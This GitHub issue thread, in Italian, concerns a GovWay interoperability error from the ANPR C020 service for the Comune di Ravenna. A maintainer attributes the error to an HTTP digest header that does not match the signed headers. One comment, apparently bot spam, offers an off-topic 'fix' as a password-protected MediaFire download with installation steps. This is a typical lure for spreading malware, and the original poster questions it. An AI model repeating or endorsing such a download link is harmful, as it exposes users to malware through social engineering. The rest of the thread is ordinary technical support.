### ISSUE TITLE
Errore sulla riattivazione di un canale in test . C020 per Comune di Ravenna

### ISSUE THREAD

**Issue by marpagno** [italia/anpr#4645]
Salve, 
 per il comune di Ravenna avevo implementato la chiamata del servizio PDND-ANPR C020 verso maggio scorso; ora ho spostato il canale su un nuovo server, ma (a parte il problema con PDND risolto dal loro helpdesk ieri) ricevo un 

{
  "type" : "https://govway.org/handling-errors/400/InteroperabilityInvalidRequest.html",
  "title" : "InteroperabilityInvalidRequest",
  "status" : 400,
  "detail" : "Received request is not conform to the required interoperability profile",
  "govway_id" : "be7a02d7-650a-11ef-8356-005056ae5232"
}

Vi chiederei la cortesia di dirmi che errore vedete lato vostro
Grazie
Marco Pagnoni

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by marpagno** [comment]
il commento di un bot? non mi era mai capitato

**Comment by afrontera85** [comment]
Salve,
l'errore è il seguente:
Validazione security token ModI 'INTEGRITY' della richiesta fallita: Header HTTP 'digest' possiede un valore differente rispetto a quello presente negli header firmati
